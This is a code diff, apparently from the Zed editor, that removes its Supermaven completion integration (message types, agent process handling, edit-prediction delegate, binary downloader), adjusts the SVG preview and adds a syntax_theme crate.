-use serde::{Deserialize, Serialize}; - -// Outbound messages -#[derive(Debug, Serialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum OutboundMessage { - StateUpdate(StateUpdateMessage), - #[allow(dead_code)] - UseFreeVersion, - Logout, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct StateUpdateMessage { - pub new_id: String, - pub updates: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum StateUpdate { - FileUpdate(FileUpdateMessage), - CursorUpdate(CursorPositionUpdateMessage), -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct FileUpdateMessage { - pub path: String, - pub content: String, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct 
CursorPositionUpdateMessage { - pub path: String, - pub offset: usize, -} - -// Inbound messages coming in on stdout - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum ResponseItem { - // A completion - Text { text: String }, - // Vestigial message type from old versions -- safe to ignore - Del { text: String }, - // Be able to delete whitespace prior to the cursor, likely for the rest of the completion - Dedent { text: String }, - // When the completion is over - End, - // Got the closing parentheses and shouldn't show any more after - Barrier, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenResponse { - pub state_id: String, - pub items: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenMetadataMessage { - pub dust_strings: Option>, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenTaskUpdateMessage { - pub task: String, - pub status: TaskStatus, - pub percent_complete: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum TaskStatus { - InProgress, - Complete, -} - -#[derive(Debug, Serialize, Deserialize)] -pub struct SupermavenActiveRepoMessage { - pub repo_simple_name: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum SupermavenPopupAction { - OpenUrl { label: String, url: String }, - NoOp { label: String }, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub struct SupermavenPopupMessage { - pub message: String, - pub actions: Vec, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "camelCase")] -pub struct ActivationRequest { - pub activate_url: Option, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenSetMessage { - pub key: String, - pub value: serde_json::Value, -} - 
-#[derive(Clone, Debug, Serialize, Deserialize)] -pub enum ServiceTier { - FreeNoLicense, - #[serde(other)] - Unknown, -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(tag = "kind", rename_all = "snake_case")] -pub enum SupermavenMessage { - Response(SupermavenResponse), - Metadata(SupermavenMetadataMessage), - Apology { - message: Option, - }, - ActivationRequest(ActivationRequest), - ActivationSuccess, - Passthrough { - passthrough: Box, - }, - Popup(SupermavenPopupMessage), - TaskStatus(SupermavenTaskUpdateMessage), - ActiveRepo(SupermavenActiveRepoMessage), - ServiceTier { - service_tier: ServiceTier, - }, - - Set(SupermavenSetMessage), - #[serde(other)] - Unknown, -} diff --git a/crates/supermaven/src/supermaven.rs b/crates/supermaven/src/supermaven.rs deleted file mode 100644 index 96f9b9c58bf934ae3991375ee8ef15cbf990dcc4..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/supermaven.rs +++ /dev/null @@ -1,485 +0,0 @@ -mod messages; -mod supermaven_edit_prediction_delegate; - -pub use supermaven_edit_prediction_delegate::*; - -use anyhow::{Context as _, Result}; -#[allow(unused_imports)] -use client::{Client, proto}; -use collections::BTreeMap; - -use futures::{AsyncBufReadExt, StreamExt, channel::mpsc, io::BufReader}; -use gpui::{App, AsyncApp, Context, Entity, EntityId, Global, Task, WeakEntity, actions}; -use language::{ - Anchor, Buffer, BufferSnapshot, ToOffset, language_settings::all_language_settings, -}; -use messages::*; -use postage::watch; -use serde::{Deserialize, Serialize}; -use settings::SettingsStore; -use smol::io::AsyncWriteExt; -use std::{path::PathBuf, sync::Arc}; -use ui::prelude::*; -use util::ResultExt; -use util::command::Child; -use util::command::Stdio; - -actions!( - supermaven, - [ - /// Signs out of Supermaven. 
- SignOut - ] -); - -pub fn init(client: Arc, cx: &mut App) { - let supermaven = cx.new(|_| Supermaven::Starting); - Supermaven::set_global(supermaven.clone(), cx); - - let mut provider = all_language_settings(None, cx).edit_predictions.provider; - if provider == language::language_settings::EditPredictionProvider::Supermaven { - supermaven.update(cx, |supermaven, cx| supermaven.start(client.clone(), cx)); - } - - cx.observe_global::(move |cx| { - let new_provider = all_language_settings(None, cx).edit_predictions.provider; - if new_provider != provider { - provider = new_provider; - if provider == language::language_settings::EditPredictionProvider::Supermaven { - supermaven.update(cx, |supermaven, cx| supermaven.start(client.clone(), cx)); - } else { - supermaven.update(cx, |supermaven, _cx| supermaven.stop()); - } - } - }) - .detach(); - - cx.on_action(|_: &SignOut, cx| { - if let Some(supermaven) = Supermaven::global(cx) { - supermaven.update(cx, |supermaven, _cx| supermaven.sign_out()); - } - }); -} - -pub enum Supermaven { - Starting, - FailedDownload { error: anyhow::Error }, - Spawned(SupermavenAgent), - Error { error: anyhow::Error }, -} - -#[derive(Clone)] -pub enum AccountStatus { - Unknown, - NeedsActivation { activate_url: String }, - Ready, -} - -#[derive(Clone)] -struct SupermavenGlobal(Entity); - -impl Global for SupermavenGlobal {} - -impl Supermaven { - pub fn global(cx: &App) -> Option> { - cx.try_global::() - .map(|model| model.0.clone()) - } - - pub fn set_global(supermaven: Entity, cx: &mut App) { - cx.set_global(SupermavenGlobal(supermaven)); - } - - pub fn start(&mut self, client: Arc, cx: &mut Context) { - if let Self::Starting = self { - cx.spawn(async move |this, cx| { - let binary_path = - supermaven_api::get_supermaven_agent_path(client.http_client()).await?; - - this.update(cx, |this, cx| { - if let Self::Starting = this { - *this = - Self::Spawned(SupermavenAgent::new(binary_path, client.clone(), cx)?); - } - anyhow::Ok(()) - }) - }) 
- .detach_and_log_err(cx) - } - } - - pub fn stop(&mut self) { - *self = Self::Starting; - } - - pub fn is_enabled(&self) -> bool { - matches!(self, Self::Spawned { .. }) - } - - pub fn complete( - &mut self, - buffer: &Entity, - cursor_position: Anchor, - cx: &App, - ) -> Option { - if let Self::Spawned(agent) = self { - let buffer_id = buffer.entity_id(); - let buffer = buffer.read(cx); - let path = buffer - .file() - .and_then(|file| Some(file.as_local()?.abs_path(cx))) - .unwrap_or_else(|| PathBuf::from("untitled")) - .to_string_lossy() - .to_string(); - let content = buffer.text(); - let offset = cursor_position.to_offset(buffer); - let state_id = agent.next_state_id; - agent.next_state_id.0 += 1; - - let (updates_tx, mut updates_rx) = watch::channel(); - postage::stream::Stream::try_recv(&mut updates_rx).unwrap(); - - agent.states.insert( - state_id, - SupermavenCompletionState { - buffer_id, - prefix_anchor: cursor_position, - prefix_offset: offset, - text: String::new(), - dedent: String::new(), - updates_tx, - }, - ); - // ensure the states map is max 1000 elements - if agent.states.len() > 1000 { - // state id is monotonic so it's sufficient to remove the first element - agent - .states - .remove(&agent.states.keys().next().unwrap().clone()); - } - - let _ = agent - .outgoing_tx - .unbounded_send(OutboundMessage::StateUpdate(StateUpdateMessage { - new_id: state_id.0.to_string(), - updates: vec![ - StateUpdate::FileUpdate(FileUpdateMessage { - path: path.clone(), - content, - }), - StateUpdate::CursorUpdate(CursorPositionUpdateMessage { path, offset }), - ], - })); - - Some(SupermavenCompletion { - id: state_id, - updates: updates_rx, - }) - } else { - None - } - } - - pub fn completion( - &self, - buffer: &Entity, - cursor_position: Anchor, - cx: &App, - ) -> Option<&str> { - if let Self::Spawned(agent) = self { - find_relevant_completion( - &agent.states, - buffer.entity_id(), - &buffer.read(cx).snapshot(), - cursor_position, - ) - } else { - None - } - 
} - - pub fn sign_out(&mut self) { - if let Self::Spawned(agent) = self { - agent - .outgoing_tx - .unbounded_send(OutboundMessage::Logout) - .ok(); - // The account status will get set to RequiresActivation or Ready when the next - // message from the agent comes in. Until that happens, set the status to Unknown - // to disable the button. - agent.account_status = AccountStatus::Unknown; - } - } -} - -fn find_relevant_completion<'a>( - states: &'a BTreeMap, - buffer_id: EntityId, - buffer: &BufferSnapshot, - cursor_position: Anchor, -) -> Option<&'a str> { - let mut best_completion: Option<&str> = None; - 'completions: for state in states.values() { - if state.buffer_id != buffer_id { - continue; - } - let Some(state_completion) = state.text.strip_prefix(&state.dedent) else { - continue; - }; - - let current_cursor_offset = cursor_position.to_offset(buffer); - if current_cursor_offset < state.prefix_offset { - continue; - } - - let original_cursor_offset = buffer.clip_offset(state.prefix_offset, text::Bias::Left); - let text_inserted_since_completion_request: String = buffer - .text_for_range(original_cursor_offset..current_cursor_offset) - .collect(); - let trimmed_completion = - match state_completion.strip_prefix(&text_inserted_since_completion_request) { - Some(suffix) => suffix, - None => continue 'completions, - }; - - if best_completion.is_some_and(|best| best.len() > trimmed_completion.len()) { - continue; - } - - best_completion = Some(trimmed_completion); - } - best_completion -} - -pub struct SupermavenAgent { - _process: Child, - next_state_id: SupermavenCompletionStateId, - states: BTreeMap, - outgoing_tx: mpsc::UnboundedSender, - _handle_outgoing_messages: Task>, - _handle_incoming_messages: Task>, - pub account_status: AccountStatus, - service_tier: Option, - #[allow(dead_code)] - client: Arc, -} - -impl SupermavenAgent { - fn new( - binary_path: PathBuf, - client: Arc, - cx: &mut Context, - ) -> Result { - let mut process = 
util::command::new_command(&binary_path) - .arg("stdio") - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .kill_on_drop(true) - .spawn() - .context("failed to start the binary")?; - - let stdin = process - .stdin - .take() - .context("failed to get stdin for process")?; - let stdout = process - .stdout - .take() - .context("failed to get stdout for process")?; - - let (outgoing_tx, outgoing_rx) = mpsc::unbounded(); - - Ok(Self { - _process: process, - next_state_id: SupermavenCompletionStateId::default(), - states: BTreeMap::default(), - outgoing_tx, - _handle_outgoing_messages: cx.spawn(async move |_, _cx| { - Self::handle_outgoing_messages(outgoing_rx, stdin).await - }), - _handle_incoming_messages: cx.spawn(async move |this, cx| { - Self::handle_incoming_messages(this, stdout, cx).await - }), - account_status: AccountStatus::Unknown, - service_tier: None, - client, - }) - } - - async fn handle_outgoing_messages( - mut outgoing: mpsc::UnboundedReceiver, - mut stdin: W, - ) -> Result<()> { - while let Some(message) = outgoing.next().await { - let bytes = serde_json::to_vec(&message)?; - stdin.write_all(&bytes).await?; - stdin.write_all(&[b'\n']).await?; - } - Ok(()) - } - - async fn handle_incoming_messages( - this: WeakEntity, - stdout: R, - cx: &mut AsyncApp, - ) -> Result<()> { - const MESSAGE_PREFIX: &str = "SM-MESSAGE "; - - let stdout = BufReader::new(stdout); - let mut lines = stdout.lines(); - while let Some(line) = lines.next().await { - let Some(line) = line.context("failed to read line from stdout").log_err() else { - continue; - }; - let Some(line) = line.strip_prefix(MESSAGE_PREFIX) else { - continue; - }; - let Some(message) = serde_json::from_str::(line) - .with_context(|| format!("failed to deserialize line from stdout: {:?}", line)) - .log_err() - else { - continue; - }; - - this.update(cx, |this, _cx| { - if let Supermaven::Spawned(this) = this { - this.handle_message(message); - } - Task::ready(anyhow::Ok(())) - })? 
- .await?; - } - - Ok(()) - } - - fn handle_message(&mut self, message: SupermavenMessage) { - match message { - SupermavenMessage::ActivationRequest(request) => { - self.account_status = match request.activate_url { - Some(activate_url) => AccountStatus::NeedsActivation { activate_url }, - None => AccountStatus::Ready, - }; - } - SupermavenMessage::ActivationSuccess => { - self.account_status = AccountStatus::Ready; - } - SupermavenMessage::ServiceTier { service_tier } => { - self.account_status = AccountStatus::Ready; - self.service_tier = Some(service_tier); - } - SupermavenMessage::Response(response) => { - let state_id = SupermavenCompletionStateId(response.state_id.parse().unwrap()); - if let Some(state) = self.states.get_mut(&state_id) { - for item in &response.items { - match item { - ResponseItem::Text { text } => state.text.push_str(text), - ResponseItem::Dedent { text } => state.dedent.push_str(text), - _ => {} - } - } - *state.updates_tx.borrow_mut() = (); - } - } - SupermavenMessage::Passthrough { passthrough } => self.handle_message(*passthrough), - _ => { - log::warn!("unhandled message: {:?}", message); - } - } - } -} - -#[derive(Copy, Clone, Debug, Default, Eq, PartialEq, Ord, PartialOrd, Serialize, Deserialize)] -pub struct SupermavenCompletionStateId(usize); - -#[allow(dead_code)] -pub struct SupermavenCompletionState { - buffer_id: EntityId, - prefix_anchor: Anchor, - // prefix_offset is tracked independently because the anchor biases left which - // doesn't allow us to determine if the prior text has been deleted. 
- prefix_offset: usize, - text: String, - dedent: String, - updates_tx: watch::Sender<()>, -} - -pub struct SupermavenCompletion { - pub id: SupermavenCompletionStateId, - pub updates: watch::Receiver<()>, -} - -#[cfg(test)] -mod tests { - use super::*; - use collections::BTreeMap; - use gpui::TestAppContext; - use language::Buffer; - - #[gpui::test] - async fn test_find_relevant_completion_no_first_letter_skip(cx: &mut TestAppContext) { - let buffer = cx.new(|cx| Buffer::local("hello world", cx)); - let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - let mut states = BTreeMap::new(); - let state_id = SupermavenCompletionStateId(1); - let (updates_tx, _) = watch::channel(); - - states.insert( - state_id, - SupermavenCompletionState { - buffer_id: buffer.entity_id(), - prefix_anchor: buffer_snapshot.anchor_before(0), // Start of buffer - prefix_offset: 0, - text: "hello".to_string(), - dedent: String::new(), - updates_tx, - }, - ); - - let cursor_position = buffer_snapshot.anchor_after(1); - - let result = find_relevant_completion( - &states, - buffer.entity_id(), - &buffer_snapshot, - cursor_position, - ); - - assert_eq!(result, Some("ello")); - } - - #[gpui::test] - async fn test_find_relevant_completion_with_multiple_chars(cx: &mut TestAppContext) { - let buffer = cx.new(|cx| Buffer::local("hello world", cx)); - let buffer_snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - let mut states = BTreeMap::new(); - let state_id = SupermavenCompletionStateId(1); - let (updates_tx, _) = watch::channel(); - - states.insert( - state_id, - SupermavenCompletionState { - buffer_id: buffer.entity_id(), - prefix_anchor: buffer_snapshot.anchor_before(0), // Start of buffer - prefix_offset: 0, - text: "hello".to_string(), - dedent: String::new(), - updates_tx, - }, - ); - - let cursor_position = buffer_snapshot.anchor_after(3); - - let result = find_relevant_completion( - &states, - buffer.entity_id(), - &buffer_snapshot, - 
cursor_position, - ); - - assert_eq!(result, Some("lo")); - } -} diff --git a/crates/supermaven/src/supermaven_edit_prediction_delegate.rs b/crates/supermaven/src/supermaven_edit_prediction_delegate.rs deleted file mode 100644 index f9eb4a210cff705d609cad3de13924a86253655a..0000000000000000000000000000000000000000 --- a/crates/supermaven/src/supermaven_edit_prediction_delegate.rs +++ /dev/null @@ -1,303 +0,0 @@ -use crate::{Supermaven, SupermavenCompletionStateId}; -use anyhow::Result; -use edit_prediction_types::{ - EditPrediction, EditPredictionDelegate, EditPredictionDiscardReason, EditPredictionIconSet, -}; -use futures::StreamExt as _; -use gpui::{App, Context, Entity, EntityId, Task}; -use language::{Anchor, Buffer, BufferSnapshot}; -use std::{ - ops::{AddAssign, Range}, - path::Path, - sync::Arc, - time::Duration, -}; -use text::{ToOffset, ToPoint}; -use ui::prelude::*; -use unicode_segmentation::UnicodeSegmentation; - -pub const DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(75); - -pub struct SupermavenEditPredictionDelegate { - supermaven: Entity, - buffer_id: Option, - completion_id: Option, - completion_text: Option, - file_extension: Option, - pending_refresh: Option>>, - completion_position: Option, -} - -impl SupermavenEditPredictionDelegate { - pub fn new(supermaven: Entity) -> Self { - Self { - supermaven, - buffer_id: None, - completion_id: None, - completion_text: None, - file_extension: None, - pending_refresh: None, - completion_position: None, - } - } -} - -// Computes the edit prediction from the difference between the completion text. -// This is defined by greedily matching the buffer text against the completion text. -// Inlays are inserted for parts of the completion text that are not present in the buffer text. -// For example, given the completion text "axbyc" and the buffer text "xy", the rendered output in the editor would be "[a]x[b]y[c]". -// The parts in brackets are the inlays. 
-fn completion_from_diff( - snapshot: BufferSnapshot, - completion_text: &str, - position: Anchor, - delete_range: Range, -) -> EditPrediction { - let buffer_text = snapshot.text_for_range(delete_range).collect::(); - - let mut edits: Vec<(Range, Arc)> = Vec::new(); - - let completion_graphemes: Vec<&str> = completion_text.graphemes(true).collect(); - let buffer_graphemes: Vec<&str> = buffer_text.graphemes(true).collect(); - - let mut offset = position.to_offset(&snapshot); - - let mut i = 0; - let mut j = 0; - while i < completion_graphemes.len() && j < buffer_graphemes.len() { - // find the next instance of the buffer text in the completion text. - let k = completion_graphemes[i..] - .iter() - .position(|c| *c == buffer_graphemes[j]); - match k { - Some(k) => { - if k != 0 { - let offset = snapshot.anchor_after(offset); - // the range from the current position to item is an inlay. - let edit = ( - offset..offset, - completion_graphemes[i..i + k].join("").into(), - ); - edits.push(edit); - } - i += k + 1; - j += 1; - offset.add_assign(buffer_graphemes[j - 1].len()); - } - None => { - // there are no more matching completions, so drop the remaining - // completion text as an inlay. - break; - } - } - } - - if j == buffer_graphemes.len() && i < completion_graphemes.len() { - let offset = snapshot.anchor_after(offset); - // there is leftover completion text, so drop it as an inlay. 
- let edit_range = offset..offset; - let edit_text = completion_graphemes[i..].join(""); - edits.push((edit_range, edit_text.into())); - } - - EditPrediction::Local { - id: None, - edits, - cursor_position: None, - edit_preview: None, - } -} - -impl EditPredictionDelegate for SupermavenEditPredictionDelegate { - fn name() -> &'static str { - "supermaven" - } - - fn display_name() -> &'static str { - "Supermaven" - } - - fn show_predictions_in_menu() -> bool { - true - } - - fn show_tab_accept_marker() -> bool { - true - } - - fn supports_jump_to_edit() -> bool { - false - } - - fn icons(&self, _cx: &App) -> EditPredictionIconSet { - EditPredictionIconSet::new(IconName::Supermaven) - .with_disabled(IconName::SupermavenDisabled) - .with_error(IconName::SupermavenError) - } - - fn is_enabled(&self, _buffer: &Entity, _cursor_position: Anchor, cx: &App) -> bool { - self.supermaven.read(cx).is_enabled() - } - - fn is_refreshing(&self, _cx: &App) -> bool { - self.pending_refresh.is_some() && self.completion_id.is_none() - } - - fn refresh( - &mut self, - buffer_handle: Entity, - cursor_position: Anchor, - debounce: bool, - cx: &mut Context, - ) { - // Only make new completion requests when debounce is true (i.e., when text is typed) - // When debounce is false (i.e., cursor movement), we should not make new requests - if !debounce { - return; - } - - reset_completion_cache(self, cx); - - let Some(mut completion) = self.supermaven.update(cx, |supermaven, cx| { - supermaven.complete(&buffer_handle, cursor_position, cx) - }) else { - return; - }; - - self.pending_refresh = Some(cx.spawn(async move |this, cx| { - if debounce { - cx.background_executor().timer(DEBOUNCE_TIMEOUT).await; - } - - while let Some(()) = completion.updates.next().await { - this.update(cx, |this, cx| { - // Get the completion text and cache it - if let Some(text) = - this.supermaven - .read(cx) - .completion(&buffer_handle, cursor_position, cx) - { - this.completion_text = Some(text.to_string()); - - 
this.completion_position = Some(cursor_position); - } - - this.completion_id = Some(completion.id); - this.buffer_id = Some(buffer_handle.entity_id()); - this.file_extension = buffer_handle.read(cx).file().and_then(|file| { - Some( - Path::new(file.file_name(cx)) - .extension()? - .to_str()? - .to_string(), - ) - }); - cx.notify(); - })?; - } - Ok(()) - })); - } - - fn accept(&mut self, _cx: &mut Context) { - reset_completion_cache(self, _cx); - } - - fn discard(&mut self, _reason: EditPredictionDiscardReason, _cx: &mut Context) { - reset_completion_cache(self, _cx); - } - - fn suggest( - &mut self, - buffer: &Entity, - cursor_position: Anchor, - cx: &mut Context, - ) -> Option { - if self.buffer_id != Some(buffer.entity_id()) { - return None; - } - - if self.completion_id.is_none() { - return None; - } - - let completion_text = if let Some(cached_text) = &self.completion_text { - cached_text.as_str() - } else { - let text = self - .supermaven - .read(cx) - .completion(buffer, cursor_position, cx)?; - self.completion_text = Some(text.to_string()); - text - }; - - // Check if the cursor is still at the same position as the completion request - // If we don't have a completion position stored, don't show the completion - if let Some(completion_position) = self.completion_position { - if cursor_position != completion_position { - return None; - } - } else { - return None; - } - - let completion_text = trim_to_end_of_line_unless_leading_newline(completion_text); - - let completion_text = completion_text.trim_end(); - - if !completion_text.trim().is_empty() { - let snapshot = buffer.read(cx).snapshot(); - - // Calculate the range from cursor to end of line correctly - let cursor_point = cursor_position.to_point(&snapshot); - let end_of_line = snapshot.anchor_after(language::Point::new( - cursor_point.row, - snapshot.line_len(cursor_point.row), - )); - let delete_range = cursor_position..end_of_line; - - Some(completion_from_diff( - snapshot, - completion_text, - 
cursor_position, - delete_range, - )) - } else { - None - } - } -} - -fn reset_completion_cache( - provider: &mut SupermavenEditPredictionDelegate, - _cx: &mut Context, -) { - provider.pending_refresh = None; - provider.completion_id = None; - provider.completion_text = None; - provider.completion_position = None; - provider.buffer_id = None; -} - -fn trim_to_end_of_line_unless_leading_newline(text: &str) -> &str { - if has_leading_newline(text) { - text - } else if let Some(i) = text.find('\n') { - &text[..i] - } else { - text - } -} - -fn has_leading_newline(text: &str) -> bool { - for c in text.chars() { - if c == '\n' { - return true; - } - if !c.is_whitespace() { - return false; - } - } - false -} diff --git a/crates/supermaven_api/src/supermaven_api.rs b/crates/supermaven_api/src/supermaven_api.rs deleted file mode 100644 index 97e70e58a18fc277d8cb17e2fb8fd3c71b884420..0000000000000000000000000000000000000000 --- a/crates/supermaven_api/src/supermaven_api.rs +++ /dev/null @@ -1,125 +0,0 @@ -use anyhow::{Context as _, Result}; -use futures::AsyncReadExt; -use futures::io::BufReader; -use http_client::{AsyncBody, HttpClient, Request as HttpRequest}; -use paths::supermaven_dir; -use serde::Deserialize; -use smol::fs::{self, File}; -use std::path::{Path, PathBuf}; -use std::sync::Arc; - -use util::fs::{make_file_executable, remove_matching}; - -#[derive(Deserialize)] -pub struct SupermavenApiError { - pub message: String, -} - -#[derive(Debug, Deserialize)] -#[serde(rename_all = "camelCase")] -pub struct SupermavenDownloadResponse { - pub download_url: String, - pub version: u64, - pub sha256_hash: String, -} - -pub async fn latest_release( - client: Arc, - platform: &str, - arch: &str, -) -> Result { - let uri = format!( - "https://supermaven.com/api/download-path?platform={}&arch={}", - platform, arch - ); - - // Download is not authenticated - let request = HttpRequest::get(&uri); - - let mut response = client - .send(request.body(AsyncBody::default())?) 
- .await - .with_context(|| "Unable to acquire Supermaven Agent".to_string())?; - - let mut body = Vec::new(); - response.body_mut().read_to_end(&mut body).await?; - - if response.status().is_client_error() || response.status().is_server_error() { - let body_str = std::str::from_utf8(&body)?; - let error: SupermavenApiError = serde_json::from_str(body_str)?; - anyhow::bail!("Supermaven API error: {}", error.message); - } - - serde_json::from_slice::(&body) - .with_context(|| "Unable to parse Supermaven Agent response".to_string()) -} - -pub fn version_path(version: u64) -> PathBuf { - supermaven_dir().join(format!( - "sm-agent-{}{}", - version, - std::env::consts::EXE_SUFFIX - )) -} - -pub async fn has_version(version_path: &Path) -> bool { - fs::metadata(version_path).await.is_ok_and(|m| m.is_file()) -} - -pub async fn get_supermaven_agent_path(client: Arc) -> Result { - fs::create_dir_all(supermaven_dir()) - .await - .with_context(|| { - format!( - "Could not create Supermaven Agent Directory at {:?}", - supermaven_dir() - ) - })?; - - let platform = match std::env::consts::OS { - "macos" => "darwin", - "windows" => "windows", - "linux" => "linux", - unsupported => anyhow::bail!("unsupported platform {unsupported}"), - }; - - let arch = match std::env::consts::ARCH { - "x86_64" => "amd64", - "aarch64" => "arm64", - unsupported => anyhow::bail!("unsupported architecture {unsupported}"), - }; - - let download_info = latest_release(client.clone(), platform, arch).await?; - - let binary_path = version_path(download_info.version); - - if has_version(&binary_path).await { - // Due to an issue with the Supermaven binary not being made executable on - // earlier Zed versions and Supermaven releases not occurring that frequently, - // we ensure here that the found binary is actually executable. 
- make_file_executable(&binary_path).await?; - - return Ok(binary_path); - } - - let request = HttpRequest::get(&download_info.download_url); - - let mut response = client - .send(request.body(AsyncBody::default())?) - .await - .with_context(|| "Unable to download Supermaven Agent".to_string())?; - - let mut file = File::create(&binary_path) - .await - .with_context(|| format!("Unable to create file at {:?}", binary_path))?; - - futures::io::copy(BufReader::new(response.body_mut()), &mut file) - .await - .with_context(|| format!("Unable to write binary to file at {:?}", binary_path))?; - - make_file_executable(&binary_path).await?; - - remove_matching(supermaven_dir(), |file| file != binary_path).await; - - Ok(binary_path) -} diff --git a/crates/svg_preview/src/svg_preview_view.rs b/crates/svg_preview/src/svg_preview_view.rs index cc7e2052295f735f06e94f080a60ef25ec4da49d..259243b8ac7cd7d4122fc2f535d490b359442440 100644 --- a/crates/svg_preview/src/svg_preview_view.rs +++ b/crates/svg_preview/src/svg_preview_view.rs @@ -110,7 +110,7 @@ impl SvgPreviewView { let renderer = cx.svg_renderer(); let content = buffer.read(cx).snapshot(); let background_task = cx.background_spawn(async move { - renderer.render_single_frame(content.text().as_bytes(), SCALE_FACTOR, true) + renderer.render_single_frame(content.text().as_bytes(), SCALE_FACTOR) }); self._refresh = cx.spawn_in(window, async move |this, cx| { @@ -182,7 +182,7 @@ impl SvgPreviewView { buffer, window, move |this, _buffer, event: &BufferEvent, window, cx| match event { - BufferEvent::Edited | BufferEvent::Saved => { + BufferEvent::Edited { .. 
} | BufferEvent::Saved => { this.render_image(window, cx); } _ => {} diff --git a/crates/syntax_theme/Cargo.toml b/crates/syntax_theme/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..18f09c9e316a230abf01d043e3ea4aec11c854ef --- /dev/null +++ b/crates/syntax_theme/Cargo.toml @@ -0,0 +1,26 @@ +[package] +name = "syntax_theme" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +default = [] +test-support = ["gpui/test-support"] +bundled-themes = ["dep:serde", "dep:serde_json"] + +[lib] +path = "src/syntax_theme.rs" +doctest = false + +[dependencies] +gpui.workspace = true +serde = { workspace = true, optional = true } +serde_json = { workspace = true, optional = true } + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } diff --git a/extensions/slash-commands-example/LICENSE-APACHE b/crates/syntax_theme/LICENSE-APACHE similarity index 100% rename from extensions/slash-commands-example/LICENSE-APACHE rename to crates/syntax_theme/LICENSE-APACHE diff --git a/crates/supermaven_api/LICENSE-GPL b/crates/syntax_theme/LICENSE-GPL similarity index 100% rename from crates/supermaven_api/LICENSE-GPL rename to crates/syntax_theme/LICENSE-GPL diff --git a/crates/syntax_theme/src/syntax_theme.rs b/crates/syntax_theme/src/syntax_theme.rs new file mode 100644 index 0000000000000000000000000000000000000000..edd02130b6e2feab6c3291817bde21b64aaddf50 --- /dev/null +++ b/crates/syntax_theme/src/syntax_theme.rs @@ -0,0 +1,336 @@ +#![allow(missing_docs)] + +use std::{ + collections::{BTreeMap, btree_map::Entry}, + sync::Arc, +}; + +use gpui::HighlightStyle; +#[cfg(any(test, feature = "test-support"))] +use gpui::Hsla; + +#[derive(Debug, PartialEq, Eq, Clone, Default)] +pub struct SyntaxTheme { + highlights: Vec, + capture_name_map: BTreeMap, +} + +impl SyntaxTheme { + pub fn new(highlights: impl IntoIterator) -> Self { + let (capture_names, 
highlights) = highlights.into_iter().unzip(); + + Self { + capture_name_map: Self::create_capture_name_map(capture_names), + highlights, + } + } + + fn create_capture_name_map(highlights: Vec) -> BTreeMap { + highlights + .into_iter() + .enumerate() + .map(|(i, key)| (key, i)) + .collect() + } + + #[cfg(any(test, feature = "test-support"))] + pub fn new_test(colors: impl IntoIterator) -> Self { + Self::new_test_styles(colors.into_iter().map(|(key, color)| { + ( + key, + HighlightStyle { + color: Some(color), + ..Default::default() + }, + ) + })) + } + + #[cfg(any(test, feature = "test-support"))] + pub fn new_test_styles( + colors: impl IntoIterator, + ) -> Self { + Self::new( + colors + .into_iter() + .map(|(key, style)| (key.to_owned(), style)), + ) + } + + pub fn get(&self, highlight_index: impl Into) -> Option<&HighlightStyle> { + self.highlights.get(highlight_index.into()) + } + + pub fn style_for_name(&self, name: &str) -> Option { + self.capture_name_map + .get(name) + .map(|highlight_idx| self.highlights[*highlight_idx]) + } + + pub fn get_capture_name(&self, idx: impl Into) -> Option<&str> { + let idx = idx.into(); + self.capture_name_map + .iter() + .find(|(_, value)| **value == idx) + .map(|(key, _)| key.as_ref()) + } + + pub fn highlight_id(&self, capture_name: &str) -> Option { + self.capture_name_map + .range::(( + capture_name.split(".").next().map_or( + std::ops::Bound::Included(capture_name), + std::ops::Bound::Included, + ), + std::ops::Bound::Included(capture_name), + )) + .rfind(|(prefix, _)| { + capture_name + .strip_prefix(*prefix) + .is_some_and(|remainder| remainder.is_empty() || remainder.starts_with('.')) + }) + .map(|(_, index)| *index as u32) + } + + /// Returns a new [`Arc`] with the given syntax styles merged in. 
+ pub fn merge(base: Arc, user_syntax_styles: Vec<(String, HighlightStyle)>) -> Arc { + if user_syntax_styles.is_empty() { + return base; + } + + let mut base = Arc::try_unwrap(base).unwrap_or_else(|base| (*base).clone()); + + for (name, highlight) in user_syntax_styles { + match base.capture_name_map.entry(name) { + Entry::Occupied(entry) => { + if let Some(existing_highlight) = base.highlights.get_mut(*entry.get()) { + existing_highlight.color = highlight.color.or(existing_highlight.color); + existing_highlight.font_weight = + highlight.font_weight.or(existing_highlight.font_weight); + existing_highlight.font_style = + highlight.font_style.or(existing_highlight.font_style); + existing_highlight.background_color = highlight + .background_color + .or(existing_highlight.background_color); + existing_highlight.underline = + highlight.underline.or(existing_highlight.underline); + existing_highlight.strikethrough = + highlight.strikethrough.or(existing_highlight.strikethrough); + existing_highlight.fade_out = + highlight.fade_out.or(existing_highlight.fade_out); + } + } + Entry::Vacant(vacant) => { + vacant.insert(base.highlights.len()); + base.highlights.push(highlight); + } + } + } + + Arc::new(base) + } +} + 